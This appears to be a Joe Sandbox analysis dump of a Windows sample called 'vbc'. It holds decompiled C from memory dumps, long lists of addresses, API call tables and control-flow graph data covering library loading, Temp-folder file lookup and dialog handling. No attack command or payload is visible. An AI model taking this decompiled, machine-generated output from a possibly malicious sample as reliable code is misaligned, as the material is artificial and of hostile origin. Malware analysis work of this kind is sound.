                    												_t136 = _t136 << 5;
                    												__eax = 0;
                    												__eflags = 0;
                    												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                    												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                    												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                    												L97:
                    												__eflags = __ebx;
                    												if(__ebx == 0) {
                    													goto L57;
                    												}
                    												L98:
                    												__eflags = _v20;
                    												_v40 = 1;
                    												if(_v20 != 0) {
                    													L103:
                    													__eflags = _v20 - 1;
                    													if(_v20 == 1) {
                    														__eax = _v16;
                    														__eax = _v16 << 5;
                    														__eflags = __eax;
                    														 *(__eax + __esi + 0x102c) = __ebx;
                    													}
                    													goto L105;
                    												}
                    												_v16 = _v16 << 5;
                    												_t144 = __esi + 0x1030; // 0x1030
                    												__edi = (_v16 << 5) + _t144;
                    												__eax =  *__edi;
                    												__eflags = __eax - 0xffffffff;
                    												if(__eax <= 0xffffffff) {
                    													L101:
                    													__eax = GlobalFree(__eax);
                    													L102:
                    													 *__edi = __ebx;
                    													goto L103;
                    												}
                    												__eflags = __eax - 0x19;
                    												if(__eax <= 0x19) {
                    													goto L102;
                    												}
                    												goto L101;
                    											}
                    											__eflags = __edx;
                    											if(__edx > 0) {
                    												goto L94;
                    											}
                    											goto L93;
                    										case 0x22:
                    											goto L57;
                    									}
                    								}
                    								_t272 = _t269 - 1;
                    								__eflags = _t272;
                    								if(_t272 == 0) {
                    									_v16 = _t283;
                    									goto L80;
                    								}
                    								__eflags = _t272 != 1;
                    								if(_t272 != 1) {
                    									goto L162;
                    								}
                    								__eflags = _t286 - 0x6e;
                    								if(__eflags > 0) {
                    									_t309 = _t286 - 0x72;
                    									__eflags = _t309;
                    									if(_t309 == 0) {
                    										_push(4);
                    										L74:
                    										_pop(_t274);
                    										L75:
                    										__eflags = _v8 - 1;
                    										if(_v8 != 1) {
                    											_t96 = _t332 + 0x1010;
                    											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                    											__eflags =  *_t96;
                    										} else {
                    											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                    										}
                    										_v8 = 1;
                    										goto L57;
                    									}
                    									_t312 = _t309 - 1;
                    									__eflags = _t312;
                    									if(_t312 == 0) {
                    										_push(0x10);
                    										goto L74;
                    									}
                    									__eflags = _t312 != 0;
                    									if(_t312 != 0) {
                    										goto L57;
                    									}
                    									_push(0x40);
                    									goto L74;
                    								}
                    								if(__eflags == 0) {
                    									_push(8);
                    									goto L74;
                    								}
                    								_t315 = _t286 - 0x21;
                    								__eflags = _t315;
                    								if(_t315 == 0) {
                    									_v8 =  ~_v8;
                    									goto L57;
                    								}
                    								_t316 = _t315 - 0x11;
                    								__eflags = _t316;
                    								if(_t316 == 0) {
                    									_t274 = 0x100;
                    									goto L75;
                    								}
                    								_t317 = _t316 - 0x31;
                    								__eflags = _t317;
                    								if(_t317 == 0) {
                    									_t274 = 1;
                    									goto L75;
                    								}
                    								__eflags = _t317 != 0;
                    								if(_t317 != 0) {
                    									goto L57;
                    								}
                    								_push(0x20);
                    								goto L74;
                    							} else {
                    								_v32 = _t283;
                    								_v36 = _t283;
                    								goto L20;
                    							}
                    						}
                    						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                    						if( *((short*)(_t321 - 2)) != 0x3a) {
                    							goto L17;
                    						}
                    						__eflags = _v32 - _t283;
                    						if(_v32 == _t283) {
                    							goto L43;
                    						}
                    						goto L17;
                    					}
                    					_t277 = _t258 - 5;
                    					if(_t277 == 0) {
                    						__eflags = _v44 - _t283;
                    						if(_v44 != _t283) {
                    							goto L43;
                    						} else {
                    							__eflags = _v36 - 3;
                    							_v32 = 1;
                    							_v8 = _t283;
                    							_v20 = _t283;
                    							_v16 = (0 | _v36 == 0x00000003) + 1;
                    							_v40 = _t283;
                    							goto L20;
                    						}
                    					}
                    					_t281 = _t277 - 1;
                    					if(_t281 == 0) {
                    						__eflags = _v44 - _t283;
                    						if(_v44 != _t283) {
                    							goto L43;
                    						} else {
                    							_v32 = 2;
                    							_v8 = _t283;
                    							_v20 = _t283;
                    							goto L20;
                    						}
                    					}
                    					if(_t281 != 0x16) {
                    						goto L43;
                    					} else {
                    						_v32 = 3;
                    						_v8 = 1;
                    						goto L20;
                    					}
                    				}
                    				GlobalFree(_v56);
                    				GlobalFree(_v24);
                    				GlobalFree(_v48);
                    				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                    					L182:
                    					return _t332;
                    				} else {
                    					_t225 =  *_t332 - 1;
                    					if(_t225 == 0) {
                    						_t187 = _t332 + 8; // 0x8
                    						_t324 = _t187;
                    						__eflags =  *_t324 - _t283;
                    						if( *_t324 != _t283) {
                    							_t226 = GetModuleHandleW(_t324);
                    							__eflags = _t226 - _t283;
                    							 *(_t332 + 0x1008) = _t226;
                    							if(_t226 != _t283) {
                    								L171:
                    								_t192 = _t332 + 0x808; // 0x808
                    								_t325 = _t192;
                    								_t227 = E734F16BD( *(_t332 + 0x1008), _t325);
                    								__eflags = _t227 - _t283;
                    								 *(_t332 + 0x100c) = _t227;
                    								if(_t227 == _t283) {
                    									__eflags =  *_t325 - 0x23;
                    									if( *_t325 == 0x23) {
                    										_t195 = _t332 + 0x80a; // 0x80a
                    										_t231 = E734F13B1(_t195);
                    										__eflags = _t231 - _t283;
                    										if(_t231 != _t283) {
                    											__eflags = _t231 & 0xffff0000;
                    											if((_t231 & 0xffff0000) == 0) {
                    												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                    											}
                    										}
                    									}
                    								}
                    								__eflags = _v52 - _t283;
                    								if(_v52 != _t283) {
                    									L178:
                    									_t325[lstrlenW(_t325)] = 0x57;
                    									_t229 = E734F16BD( *(_t332 + 0x1008), _t325);
                    									__eflags = _t229 - _t283;
                    									if(_t229 != _t283) {
                    										L166:
                    										 *(_t332 + 0x100c) = _t229;
                    										goto L182;
                    									}
                    									__eflags =  *(_t332 + 0x100c) - _t283;
                    									L180:
                    									if(__eflags != 0) {
                    										goto L182;
                    									}
                    									L181:
                    									_t206 = _t332 + 4;
                    									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                    									__eflags =  *_t206;
                    									goto L182;
                    								} else {
                    									__eflags =  *(_t332 + 0x100c) - _t283;
                    									if( *(_t332 + 0x100c) != _t283) {
                    										goto L182;
                    									}
                    									goto L178;
                    								}
                    							}
                    							_t234 = LoadLibraryW(_t324); // executed
                    							__eflags = _t234 - _t283;
                    							 *(_t332 + 0x1008) = _t234;
                    							if(_t234 == _t283) {
                    								goto L181;
                    							}
                    							goto L171;
                    						}
                    						_t188 = _t332 + 0x808; // 0x808
                    						_t236 = E734F13B1(_t188);
                    						 *(_t332 + 0x100c) = _t236;
                    						__eflags = _t236 - _t283;
                    						goto L180;
                    					}
                    					_t237 = _t225 - 1;
                    					if(_t237 == 0) {
                    						_t185 = _t332 + 0x808; // 0x808
                    						_t238 = _t185;
                    						__eflags =  *_t238 - _t283;
                    						if( *_t238 == _t283) {
                    							goto L182;
                    						}
                    						_t229 = E734F13B1(_t238);
                    						L165:
                    						goto L166;
                    					}
                    					if(_t237 != 1) {
                    						goto L182;
                    					}
                    					_t81 = _t332 + 8; // 0x8
                    					_t284 = _t81;
                    					_t326 = E734F13B1(_t81);
                    					 *(_t332 + 0x1008) = _t326;
                    					if(_t326 == 0) {
                    						goto L181;
                    					}
                    					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                    					 *((intOrPtr*)(_t332 + 0x1050)) = E734F12CC(_t284);
                    					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                    					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                    					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                    					_t90 = _t332 + 0x808; // 0x808
                    					_t229 =  *(_t326->i + E734F13B1(_t90) * 4);
                    					goto L165;
                    				}
                    			}


































































                    0x734f1c07
                    0x734f1c0a
                    0x734f1c0d
                    0x734f1c10
                    0x734f1c13
                    0x734f1c16
                    0x734f1c19
                    0x734f1c1b
                    0x734f1c1e
                    0x734f1c21
                    0x734f1c26
                    0x734f1c29
                    0x734f1c31
                    0x734f1c39
                    0x734f1c3b
                    0x734f1c3e
                    0x734f1c46
                    0x734f1c46
                    0x734f1c4b
                    0x734f1c4e
                    0x00000000
                    0x00000000
                    0x734f1c5b
                    0x734f1c60
                    0x734f1c62
                    0x734f1cf4
                    0x734f1cf4
                    0x734f1cf4
                    0x734f1cf8
                    0x734f1cfb
                    0x734f1cfd
                    0x734f1d1f
                    0x734f1d21
                    0x734f1d24
                    0x734f1d2d
                    0x734f1d33
                    0x734f1d35
                    0x734f1d3b
                    0x734f1d3b
                    0x734f1d41
                    0x734f1d44
                    0x734f1d44
                    0x734f1d47
                    0x734f1d47
                    0x734f1d4d
                    0x734f1d4f
                    0x734f1d4f
                    0x734f1d51
                    0x734f1d54
                    0x734f1d57
                    0x734f1d5d
                    0x734f1d63
                    0x734f1d66
                    0x734f1d8a
                    0x734f1d8d
                    0x00000000
                    0x00000000
                    0x734f1d90
                    0x734f1d92
                    0x734f1da0
                    0x734f1da3
                    0x734f1da5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1da7
                    0x734f1da7
                    0x734f1da7
                    0x734f1dad
                    0x734f1daf
                    0x00000000
                    0x00000000
                    0x734f1db1
                    0x734f1db3
                    0x734f1db5
                    0x734f1db7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1db7
                    0x734f1db9
                    0x734f1dbb
                    0x734f1dbd
                    0x734f1dbd
                    0x734f1dc3
                    0x734f1dc9
                    0x734f1dcb
                    0x734f1ddf
                    0x734f1ddf
                    0x734f1de1
                    0x734f1dcd
                    0x734f1dd3
                    0x734f1dd6
                    0x734f1dd6
                    0x00000000
                    0x734f1d68
                    0x734f1d68
                    0x734f1d68
                    0x734f1d69
                    0x734f1d71
                    0x734f1d75
                    0x734f1d7b
                    0x734f1d7f
                    0x00000000
                    0x734f1d7f
                    0x734f1d6b
                    0x734f1d6b
                    0x734f1d6c
                    0x00000000
                    0x00000000
                    0x734f1d6e
                    0x734f1d6f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1d6f
                    0x734f1cff
                    0x734f1d00
                    0x734f1d09
                    0x734f1d0c
                    0x734f1d19
                    0x734f1d19
                    0x734f1d0e
                    0x734f1d0e
                    0x734f1de7
                    0x734f1dea
                    0x734f1dee
                    0x734f1e61
                    0x734f1e65
                    0x734f1c43
                    0x00000000
                    0x734f1c43
                    0x00000000
                    0x734f1e65
                    0x734f1cfd
                    0x734f1c68
                    0x734f1c6b
                    0x734f1cce
                    0x734f1cd1
                    0x734f1ce3
                    0x734f1ce3
                    0x734f1ce6
                    0x734f1df3
                    0x734f1df6
                    0x734f1df6
                    0x734f1df8
                    0x734f21ae
                    0x734f21c6
                    0x734f21c6
                    0x734f21c9
                    0x00000000
                    0x00000000
                    0x734f21b3
                    0x734f21b4
                    0x734f21b7
                    0x734f21ba
                    0x734f2244
                    0x734f224b
                    0x734f2251
                    0x734f2255
                    0x734f1e5c
                    0x734f1e5d
                    0x734f1e5d
                    0x734f1e5e
                    0x00000000
                    0x734f1e5e
                    0x734f21c0
                    0x734f21c3
                    0x734f21c3
                    0x734f21cb
                    0x734f21ce
                    0x734f2238
                    0x734f1e51
                    0x734f1e54
                    0x734f1e57
                    0x734f1e5a
                    0x734f1e5a
                    0x00000000
                    0x734f1e5a
                    0x734f21d0
                    0x734f21d3
                    0x734f21da
                    0x734f21da
                    0x734f21dd
                    0x734f21e1
                    0x734f21f5
                    0x734f21f5
                    0x734f21f8
                    0x734f21fc
                    0x00000000
                    0x00000000
                    0x734f21fe
                    0x734f2202
                    0x00000000
                    0x00000000
                    0x734f2204
                    0x734f220b
                    0x734f220b
                    0x734f2211
                    0x734f2214
                    0x734f2230
                    0x734f2216
                    0x734f221f
                    0x734f2222
                    0x734f2222
                    0x00000000
                    0x734f2214
                    0x734f21e3
                    0x734f21e6
                    0x734f21ea
                    0x00000000
                    0x00000000
                    0x734f21ec
                    0x00000000
                    0x734f21ec
                    0x734f21d5
                    0x734f21d8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f21d8
                    0x734f1dfe
                    0x734f1dfe
                    0x734f1dff
                    0x734f1f49
                    0x734f1f49
                    0x734f1f50
                    0x734f1f53
                    0x00000000
                    0x00000000
                    0x734f1f60
                    0x00000000
                    0x734f214b
                    0x734f214e
                    0x734f2151
                    0x734f2151
                    0x734f2152
                    0x734f2153
                    0x734f2156
                    0x734f2159
                    0x734f215c
                    0x00000000
                    0x00000000
                    0x734f215e
                    0x734f215e
                    0x734f2162
                    0x734f217a
                    0x734f217d
                    0x734f2181
                    0x734f2187
                    0x00000000
                    0x734f2187
                    0x734f2164
                    0x734f2164
                    0x734f2167
                    0x00000000
                    0x00000000
                    0x734f2169
                    0x734f216c
                    0x734f216e
                    0x734f216f
                    0x734f216f
                    0x734f216f
                    0x734f2170
                    0x734f2173
                    0x734f2176
                    0x734f2177
                    0x734f2151
                    0x734f2152
                    0x734f2153
                    0x734f2156
                    0x734f2159
                    0x734f215c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f215c
                    0x00000000
                    0x734f1fa7
                    0x00000000
                    0x00000000
                    0x734f1fb3
                    0x00000000
                    0x00000000
                    0x734f1f9a
                    0x734f1f9e
                    0x734f1fa2
                    0x00000000
                    0x00000000
                    0x734f211c
                    0x734f2120
                    0x00000000
                    0x00000000
                    0x734f2126
                    0x734f212f
                    0x734f2136
                    0x734f213e
                    0x00000000
                    0x00000000
                    0x734f2083
                    0x734f2083
                    0x00000000
                    0x00000000
                    0x734f1fbc
                    0x00000000
                    0x00000000
                    0x734f21a6
                    0x00000000
                    0x00000000
                    0x734f208b
                    0x734f208d
                    0x734f208d
                    0x00000000
                    0x00000000
                    0x734f2196
                    0x00000000
                    0x00000000
                    0x734f219a
                    0x00000000
                    0x00000000
                    0x734f21a2
                    0x00000000
                    0x00000000
                    0x734f20d3
                    0x734f20d5
                    0x734f20d5
                    0x00000000
                    0x00000000
                    0x734f209d
                    0x734f209f
                    0x734f209f
                    0x00000000
                    0x00000000
                    0x734f20af
                    0x734f20b1
                    0x734f20b1
                    0x00000000
                    0x00000000
                    0x734f20e1
                    0x734f20e3
                    0x734f20e3
                    0x00000000
                    0x00000000
                    0x734f20ba
                    0x734f20bc
                    0x734f20bc
                    0x00000000
                    0x00000000
                    0x734f20c1
                    0x00000000
                    0x00000000
                    0x734f219e
                    0x734f21a8
                    0x734f21a8
                    0x00000000
                    0x00000000
                    0x734f20ec
                    0x734f20f0
                    0x734f20f5
                    0x734f20f8
                    0x734f20f9
                    0x734f20fc
                    0x734f2102
                    0x734f2102
                    0x00000000
                    0x00000000
                    0x734f218e
                    0x00000000
                    0x00000000
                    0x734f20c5
                    0x734f20c7
                    0x734f20c7
                    0x00000000
                    0x00000000
                    0x734f1fc3
                    0x734f1fc3
                    0x00000000
                    0x00000000
                    0x734f20da
                    0x734f20dc
                    0x734f20dc
                    0x00000000
                    0x00000000
                    0x734f1f67
                    0x734f1f6d
                    0x734f1f70
                    0x734f1f72
                    0x734f1f72
                    0x734f1f75
                    0x734f1f79
                    0x734f1f86
                    0x734f1f88
                    0x734f1f8e
                    0x734f1f8e
                    0x734f1f8e
                    0x00000000
                    0x00000000
                    0x734f208e
                    0x734f208e
                    0x734f2090
                    0x734f2097
                    0x00000000
                    0x00000000
                    0x734f20d6
                    0x734f20d6
                    0x00000000
                    0x00000000
                    0x734f20a0
                    0x734f20a0
                    0x734f20a2
                    0x734f20a9
                    0x00000000
                    0x00000000
                    0x734f20b2
                    0x734f20b2
                    0x734f20b4
                    0x00000000
                    0x00000000
                    0x734f20e4
                    0x734f20e4
                    0x00000000
                    0x00000000
                    0x734f20bd
                    0x734f20bd
                    0x00000000
                    0x00000000
                    0x734f210a
                    0x734f210e
                    0x734f2113
                    0x734f2116
                    0x00000000
                    0x00000000
                    0x734f20c8
                    0x734f20c8
                    0x734f20cb
                    0x734f20cd
                    0x00000000
                    0x00000000
                    0x734f20dd
                    0x734f20dd
                    0x734f20e6
                    0x734f20e6
                    0x734f1fc5
                    0x734f1fc5
                    0x734f1fc8
                    0x734f1fcf
                    0x734f1fd1
                    0x734f1fd3
                    0x734f1fda
                    0x734f1fdd
                    0x734f1fe2
                    0x734f1fe4
                    0x734f1fe6
                    0x734f1fea
                    0x734f1ff0
                    0x734f1ff6
                    0x734f1ff6
                    0x734f1ff8
                    0x734f1ff8
                    0x734f1ff9
                    0x734f1ff9
                    0x734f1ffd
                    0x734f2003
                    0x734f2005
                    0x734f2009
                    0x734f200e
                    0x734f200e
                    0x734f2010
                    0x734f2010
                    0x734f2013
                    0x734f2016
                    0x734f201f
                    0x734f2025
                    0x734f2028
                    0x734f2028
                    0x734f202a
                    0x734f202d
                    0x734f2033
                    0x734f2039
                    0x734f2039
                    0x734f203b
                    0x00000000
                    0x00000000
                    0x734f2041
                    0x734f2041
                    0x734f2045
                    0x734f204c
                    0x734f2070
                    0x734f2070
                    0x734f2074
                    0x734f2076
                    0x734f2079
                    0x734f2079
                    0x734f207c
                    0x734f207c
                    0x00000000
                    0x734f2074
                    0x734f2051
                    0x734f2054
                    0x734f2054
                    0x734f205b
                    0x734f205d
                    0x734f2060
                    0x734f2067
                    0x734f2068
                    0x734f206e
                    0x734f206e
                    0x00000000
                    0x734f206e
                    0x734f2062
                    0x734f2065
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f2065
                    0x734f1ff2
                    0x734f1ff4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1f60
                    0x734f1e05
                    0x734f1e05
                    0x734f1e06
                    0x734f1f46
                    0x00000000
                    0x734f1f46
                    0x734f1e0c
                    0x734f1e0d
                    0x00000000
                    0x00000000
                    0x734f1e13
                    0x734f1e16
                    0x734f1f0b
                    0x734f1f0b
                    0x734f1f0e
                    0x734f1f23
                    0x734f1f25
                    0x734f1f25
                    0x734f1f26
                    0x734f1f29
                    0x734f1f2c
                    0x734f1f38
                    0x734f1f38
                    0x734f1f38
                    0x734f1f2e
                    0x734f1f2e
                    0x734f1f2e
                    0x734f1f3e
                    0x00000000
                    0x734f1f3e
                    0x734f1f10
                    0x734f1f10
                    0x734f1f11
                    0x734f1f1f
                    0x00000000
                    0x734f1f1f
                    0x734f1f14
                    0x734f1f15
                    0x00000000
                    0x00000000
                    0x734f1f1b
                    0x00000000
                    0x734f1f1b
                    0x734f1e1c
                    0x734f1f07
                    0x00000000
                    0x734f1f07
                    0x734f1e22
                    0x734f1e22
                    0x734f1e25
                    0x734f1e4e
                    0x00000000
                    0x734f1e4e
                    0x734f1e27
                    0x734f1e27
                    0x734f1e2a
                    0x734f1e44
                    0x00000000
                    0x734f1e44
                    0x734f1e2c
                    0x734f1e2c
                    0x734f1e2f
                    0x734f1e3e
                    0x00000000
                    0x734f1e3e
                    0x734f1e32
                    0x734f1e33
                    0x00000000
                    0x00000000
                    0x734f1e35
                    0x00000000
                    0x734f1cec
                    0x734f1cec
                    0x734f1cef
                    0x00000000
                    0x734f1cef
                    0x734f1ce6
                    0x734f1cd3
                    0x734f1cd8
                    0x00000000
                    0x00000000
                    0x734f1cda
                    0x734f1cdd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f1cdd
                    0x734f1c6d
                    0x734f1c70
                    0x734f1ca6
                    0x734f1ca9
                    0x00000000
                    0x734f1caf
                    0x734f1cb1
                    0x734f1cb5
                    0x734f1cbc
                    0x734f1cc3
                    0x734f1cc6
                    0x734f1cc9
                    0x00000000
                    0x734f1cc9
                    0x734f1ca9
                    0x734f1c72
                    0x734f1c73
                    0x734f1c8e
                    0x734f1c91
                    0x00000000
                    0x734f1c97
                    0x734f1c97
                    0x734f1c9e
                    0x734f1ca1
                    0x00000000
                    0x734f1ca1
                    0x734f1c91
                    0x734f1c78
                    0x00000000
                    0x734f1c7e
                    0x734f1c7e
                    0x734f1c85
                    0x00000000
                    0x734f1c85
                    0x734f1c78
                    0x734f1e74
                    0x734f1e79
                    0x734f1e7e
                    0x734f1e82
                    0x734f2355
                    0x734f235b
                    0x734f1e94
                    0x734f1e96
                    0x734f1e97
                    0x734f227e
                    0x734f227e
                    0x734f2281
                    0x734f2284
                    0x734f22a1
                    0x734f22a7
                    0x734f22a9
                    0x734f22af
                    0x734f22c6
                    0x734f22c6
                    0x734f22c6
                    0x734f22d3
                    0x734f22d9
                    0x734f22dc
                    0x734f22e2
                    0x734f22e4
                    0x734f22e8
                    0x734f22ea
                    0x734f22f1
                    0x734f22f6
                    0x734f22f9
                    0x734f22fb
                    0x734f2300
                    0x734f2312
                    0x734f2312
                    0x734f2300
                    0x734f22f9
                    0x734f22e8
                    0x734f2318
                    0x734f231b
                    0x734f2325
                    0x734f232d
                    0x734f233a
                    0x734f2340
                    0x734f2343
                    0x734f2273
                    0x734f2273
                    0x00000000
                    0x734f2273
                    0x734f2349
                    0x734f234f
                    0x734f234f
                    0x00000000
                    0x00000000
                    0x734f2351
                    0x734f2351
                    0x734f2351
                    0x734f2351
                    0x00000000
                    0x734f231d
                    0x734f231d
                    0x734f2323
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f2323
                    0x734f231b
                    0x734f22b2
                    0x734f22b8
                    0x734f22ba
                    0x734f22c0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f22c0
                    0x734f2286
                    0x734f228d
                    0x734f2293
                    0x734f2299
                    0x00000000
                    0x734f2299
                    0x734f1e9d
                    0x734f1e9e
                    0x734f225d
                    0x734f225d
                    0x734f2263
                    0x734f2266
                    0x00000000
                    0x00000000
                    0x734f226d
                    0x734f2272
                    0x00000000
                    0x734f2272
                    0x734f1ea5
                    0x00000000
                    0x00000000
                    0x734f1eab
                    0x734f1eab
                    0x734f1eb4
                    0x734f1eb9
                    0x734f1ebf
                    0x00000000
                    0x00000000
                    0x734f1ec5
                    0x734f1ed2
                    0x734f1ed8
                    0x734f1ee2
                    0x734f1ee8
                    0x734f1ef0
                    0x734f1f00
                    0x00000000
                    0x734f1f00

                    APIs
                      • Part of subcall function 734F12BB: GlobalAlloc.KERNELBASE(00000040,?,734F12DB,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12C5
                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 734F1D2D
                    • lstrcpyW.KERNEL32(00000008,?), ref: 734F1D75
                    • lstrcpyW.KERNEL32(00000808,?), ref: 734F1D7F
                    • GlobalFree.KERNEL32(00000000), ref: 734F1D92
                    • GlobalFree.KERNEL32(?), ref: 734F1E74
                    • GlobalFree.KERNEL32(?), ref: 734F1E79
                    • GlobalFree.KERNEL32(?), ref: 734F1E7E
                    • GlobalFree.KERNEL32(00000000), ref: 734F2068
                    • lstrcpyW.KERNEL32(?,?), ref: 734F2222
                    • GetModuleHandleW.KERNEL32(00000008), ref: 734F22A1
                    • LoadLibraryW.KERNEL32(00000008), ref: 734F22B2
                    • GetProcAddress.KERNEL32(?,?), ref: 734F230C
                    • lstrlenW.KERNEL32(00000808), ref: 734F2326
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                    • String ID:
                    • API String ID: 245916457-0
                    • Opcode ID: c310631a2da6e60cef2fa28dfba38ddd2b8eb5ae73e2008d5d6b1c5e5f861635
                    • Instruction ID: eb163188c22dc03ba171614848db31c953467d1a179f3779a7a433dc90a67327
                    • Opcode Fuzzy Hash: c310631a2da6e60cef2fa28dfba38ddd2b8eb5ae73e2008d5d6b1c5e5f861635
                    • Instruction Fuzzy Hash: CB228775D0024BDFDB19DFA4C9807EEB7B5FB08319F1C452ED1A6E2284D7709A828B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 946 406850-406864 FindFirstFileW 947 406871 946->947 948 406866-40686f FindClose 946->948 949 406873-406874 947->949 948->949
                    C-Code - Quality: 100%
                    			E00406850(WCHAR* _a4) {
                    				void* _t2;
                    
                    				_t2 = FindFirstFileW(_a4, 0x7a4f98); // executed
                    				if(_t2 == 0xffffffff) {
                    					return 0;
                    				}
                    				FindClose(_t2);
                    				return 0x7a4f98;
                    			}




                    0x0040685b
                    0x00406864
                    0x00000000
                    0x00406871
                    0x00406867
                    0x00000000

                    APIs
                    • FindFirstFileW.KERNELBASE(7556D4C4,007A4F98,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00405F3A,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,7556D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,7556D4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040685B
                    • FindClose.KERNEL32(00000000), ref: 00406867
                    Strings
                    • C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp, xrefs: 00406850
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
                    • API String ID: 2295610775-2005183556
                    • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                    • Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
                    • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                    • Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 194 403f77-403f89 195 4040f0-4040ff 194->195 196 403f8f-403f95 194->196 197 404101-404149 GetDlgItem * 2 call 404476 SetClassLongW call 40140b 195->197 198 40414e-404163 195->198 196->195 199 403f9b-403fa4 196->199 197->198 201 4041a3-4041a8 call 4044c2 198->201 202 404165-404168 198->202 203 403fa6-403fb3 SetWindowPos 199->203 204 403fb9-403fc0 199->204 218 4041ad-4041c8 201->218 208 40416a-404175 call 401389 202->208 209 40419b-40419d 202->209 203->204 205 403fc2-403fdc ShowWindow 204->205 206 404004-40400a 204->206 211 403fe2-403ff5 GetWindowLongW 205->211 212 4040dd-4040eb call 4044dd 205->212 213 404023-404026 206->213 214 40400c-40401e DestroyWindow 206->214 208->209 234 404177-404196 SendMessageW 208->234 209->201 217 404443 209->217 211->212 221 403ffb-403ffe ShowWindow 211->221 224 404445-40444c 212->224 225 404028-404034 SetWindowLongW 213->225 226 404039-40403f 213->226 222 404420-404426 214->222 217->224 219 4041d1-4041d7 218->219 220 4041ca-4041cc call 40140b 218->220 231 404401-40441a DestroyWindow EndDialog 219->231 232 4041dd-4041e8 219->232 220->219 221->206 222->217 230 404428-40442e 222->230 225->224 226->212 233 404045-404054 GetDlgItem 226->233 230->217 236 404430-404439 ShowWindow 230->236 231->222 232->231 237 4041ee-40423b call 406557 call 404476 * 3 GetDlgItem 232->237 238 404073-404076 233->238 239 404056-40406d SendMessageW IsWindowEnabled 233->239 234->224 236->217 266 404245-404281 ShowWindow KiUserCallbackDispatcher call 404498 EnableWindow 237->266 267 40423d-404242 237->267 241 